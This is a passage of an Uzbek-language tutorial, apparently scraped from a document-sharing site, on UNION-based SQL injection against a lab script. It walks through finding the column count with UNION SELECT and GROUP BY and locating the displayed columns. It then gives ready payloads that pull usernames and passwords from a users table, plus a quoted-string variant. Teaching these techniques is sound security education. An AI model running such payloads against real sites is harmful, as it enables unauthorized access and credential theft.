• GROUP BY Kopincha 20 yoki 40 yoki hatto 60 ta maydon bolishi mumkin. Ularni har safar takrorlash shart emasligi uchun biz GROUP BY
  • Chiquvchi ustunlarini aniqlash
  • Malumotlar chiqishi Aytaylik, id , name va pass
    		•

    Shuningdek, O’zbekiston Prezidenti 7-fevral kungi farmoni bilan 2017




    Download 67,89 Kb.
    bet4/24
    Sana20.05.2024
    Hajmi67,89 Kb.
    #246484
    1   2   3   4   5   6   7   8   9   ...   24
    Bog'liq
    Shuningdek, O’zbekiston Prezidenti 7-fevral kungi farmoni bilan -hozir.org

    Maydonlar sonini tanlaymiz
    Maydonlarni tanlash juda oddiy, bunday so'rovlarni yuborish kifoya:
    sqlinj/index1.php?id=1 UNION SELECT 1,2
    Xato ...
    sqlinj/index1.php?id=1 UNION SELECT 1,2,3
    Yana bir xato!
    sqlinj/index1.php?id=1 UNION SELECT 1,2,3,4,5
    Xatolik yo'q! Shunday qilib, ustunlar soni 5 ga teng.


    GROUP BY
    Ko'pincha 20 yoki 40 yoki hatto 60 ta maydon bo'lishi mumkin. Ularni har safar takrorlash shart emasligi uchun biz GROUP BY dan foydalanamiz
    Agar
    sqlinj/index1.php?id=1 GROUP BY 2
    so'rovi xato chiqmagan bo'lsa, u holda maydonlar soni 2 dan ortiq.
    Yana ushbu amalni bajaramiz:
    sqlinj/index1.php?id=1 GROUP BY 8
    Biz xatoni ko'ramiz, demak maydonlar soni 8 dan kam.
    Agar GROUP BY 4 da xato bo'lmasa va GROUP BY 6 da xato bo‘lsa, maydonlar soni 5 ga teng bo‘ladi.


    Chiquvchi ustunlarini aniqlash
    Birinchi so‘rovda hech narsa ko‘rsatilmasligi uchun mavjud bo‘lmagan identifikatorni almashtirish kifoya, masalan:
    sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5
    Ushbu amal bilan , biz sahifada qaysi ustunlar ko'rsatilishini aniqladik. endi, bu raqamlarni kerakli ma'lumotlar bilan almashtirish uchun so'rovni davom ettirishingiz kerak.
    Ma'lumotlar chiqishi
    Aytaylik, id , name va pass maydonlari mavjud bo'lgan users jadvali mavjudligini bilamiz . ID=1 bo'lgan foydalanuvchi haqida ma'lumot olishimiz kerak
    Shuning uchun biz shunday so'rovni tuzamiz:
    sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5 FROM users WHERE id=1
    Skript chiqarishni davom ettiradi
    Buning uchun maydonlar nomini, 1 va 3 raqamlari o‘rniga qo`yamiz.
    sqlinj/index1.php?id=-1 UNION SELECT name,2,pass,4,5 FROM users WHERE id=1
    Biz kerakli narsani oldik!
    index2.php skriptidagi kabi "qatorli kiritish" uchun siz boshiga qo`shtirnoq va oxirida sharh belgisini qo'shishingiz kerak. Misol :
    sqlinj/index2.php?user=-1' UNION SELECT name,2,pass,4,5 FROM users WHERE id=1 --%20



    Download 67,89 Kb.
    1   2   3   4   5   6   7   8   9   ...   24




    Download 67,89 Kb.
    Bosh sahifa
    Aloqalar
        Bosh sahifa
    Dərs
    Mühazirə
    Qaydalar
    Referat
    Xülasə
    Yazı


    Shuningdek, O’zbekiston Prezidenti 7-fevral kungi farmoni bilan 2017

    Download 67,89 Kb.